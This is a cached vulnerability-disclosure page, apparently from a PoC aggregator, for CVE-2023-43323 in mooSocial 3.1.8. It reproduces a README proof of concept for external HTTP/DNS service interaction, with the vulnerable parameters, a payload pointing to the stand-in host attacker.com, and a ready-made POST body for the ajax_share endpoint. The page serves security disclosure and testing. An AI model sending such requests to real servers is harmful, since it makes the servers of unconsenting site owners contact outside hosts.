CVE-2023-43323 PoC — mooSocial 安全漏洞

Source

https://github.com/ahrixia/CVE-2023-43323

Associated Vulnerability

Title:mooSocial 安全漏洞 (CVE-2023-43323)
Description:mooSocial是mooSocial公司的一个多平台、移动就绪、用户友好的脚本。用于构建社区驱动的内容共享和社交网络网站。 mooSocial 3.1.8版本存在安全漏洞，该漏洞源于容易受到外部服务交互的影响。

Description

mooSocial v3.1.8 is vulnerable to external service interaction on post function.

Readme

# mooSocial: External HTTP and DNS Service Interaction (CVE-2023-43323)
mooSocial v3.1.8 is vulnerable to external service interaction on post function. When executed, the server sends a HTTP and DNS request to external server.

Vulerable Parameter: **messageText**,  **data[wall_photo]**, **data[userShareVideo]**  and **data[userShareLink]**
## Exploit - Proof of Concept (POC)

### External HTTP and DNS Service Interaction
```
Payload : http://attacker.com/?null=
```
POST Request on /moosocial/activities/ajax_share (POST REQUEST DATA ONLY): 
```
[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http%3A%2F%2Fattacker.com%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]
```


![image](https://github.com/ahrixia/CVE-2023-43323/assets/35935843/1f0ddaf9-8777-4b00-91e6-b66b062b817f)

File Snapshot


 [4.0K]  /data/pocs/d0213d83a54bba3f92ab2593b82b486f45594127
└── [ 949]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!